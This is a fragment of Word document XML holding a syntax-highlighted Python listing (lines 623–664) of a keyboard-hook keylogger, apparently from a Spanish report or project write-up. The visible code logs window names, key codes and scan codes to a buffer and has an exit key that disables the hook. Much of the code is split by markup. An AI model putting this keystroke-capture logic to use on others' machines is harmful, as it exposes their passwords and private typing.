    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="970" w:name="l623"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">623  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="970"/>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971" w:name="l624"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">624  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="971"/>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="972" w:name="l625"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">625  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="97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973" w:name="l626"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">626  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="973"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s01"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t># Logging and verbose (for debug) of keystrokes and related info</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="974" w:name="l627"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">627  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="974"/>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Ti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ime</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75" w:name="l628"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">628  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="975"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">              </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s41"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">' MessageNa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Name</w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s31"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">) </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s21"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">+ </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s41"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">' Messag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976" w:name="l629"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">629  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="97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7" w:name="l630"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">630  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="977"/>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Window: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w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s31"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">) </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s21"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">+ </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s41"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">' WindowName: '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WindowName</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="978" w:name="l631"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">631  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="97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9" w:name="l632"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">632  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="979"/>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Ascii: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41"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">' Chr: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ch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0" w:name="l633"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">633  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="980"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">              </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s41"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">' Key: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 </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s41"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">' KeyI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ID</w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s31"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="981" w:name="l634"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">634  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="98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82" w:name="l635"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">635  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="982"/>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ScanCod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ScanCode</w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s31"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">) </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s21"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">+ </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s41"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">' Extend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Extended</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3" w:name="l636"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">636  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="983"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">              </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s41"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">' Inject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Injected</w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s31"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">) </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s21"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">+ </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s41"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">' Alt: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lt</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84" w:name="l637"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">637  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="984"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">              </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s41"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">' Transition: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ransition</w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s31"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="985" w:name="l638"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">638  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="98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86" w:name="l639"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">639  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="986"/>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="987" w:name="l640"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">640  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="987"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s01"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t># If user change active window or is the first time, saves Window Name</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="988" w:name="l641"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">641  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="988"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s21"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">if </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21"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="989" w:name="l642"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">642  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="989"/>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90" w:name="l643"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">643  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="990"/>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91" w:name="l644"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">644  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="991"/>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="992" w:name="l645"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">645  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="992"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s01"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t># If especial key to close keylogger is pressed</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="993" w:name="l646"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">646  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="993"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s21"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">if </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s11"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>event</w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s31"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s11"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">Ascii </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s21"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">== </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s11"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>KEYCODE_EXIT</w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s21"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="994" w:name="l647"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">647  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="99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 aplicación por combinación especial de tecla {}'</w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s31"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s11"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>format</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w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="995" w:name="l648"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">648  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="99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96" w:name="l649"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">649  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="996"/>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997" w:name="l650"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">650  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="997"/>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="998" w:name="l651"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">651  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="998"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s01"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t># Save key to buffer</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="999" w:name="l652"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">652  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="999"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">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p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1000" w:name="l653"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">653  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="1000"/>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1001" w:name="l654"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">654  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="1001"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s01"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t># Saves current event info to compare with next one.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1002" w:name="l655"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">655  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="1002"/>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1003" w:name="l656"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">656  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="1003"/>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1004" w:name="l657"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">657  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="1004"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s11"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>print</w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s31"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s41"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">"Exception %s " </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s2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1005" w:name="l658"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">658  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="1005"/>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1006" w:name="l659"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">659  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="1006"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s01"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t># Exit control, Disables Hook</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1007" w:name="l660"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">660  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="1007"/>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1008" w:name="l661"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">661  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="1008"/>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009" w:name="l662"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">662  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="1009"/>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1010" w:name="l663"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">663  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="1010"/>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1011" w:name="l664"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">664  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="1011"/>
    </w:p>
